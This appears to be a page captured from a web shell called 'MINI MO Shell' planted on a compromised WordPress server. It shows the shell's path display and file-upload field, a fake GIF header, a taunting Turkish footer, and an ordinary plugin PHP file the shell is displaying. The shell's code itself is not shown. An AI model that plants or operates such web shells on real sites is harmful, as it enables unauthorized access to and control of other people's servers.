GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/util/wp/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/util/wp/conditionals.php

<?php

namespace Breakdance\Util\WP;

use function Breakdance\Themeless\Rules\isSearch;

/**
 * @return bool
 */
function is_home_when_home_is_the_posts_archive()
{
    return is_home() && !is_front_page();
}

/**
 * @return bool
 */
function isAnyArchive(){
    return is_archive() || is_post_type_archive() || is_home() || isSearch();
}


OHA YOOO - Tarih: 2026-08-04 00:29:00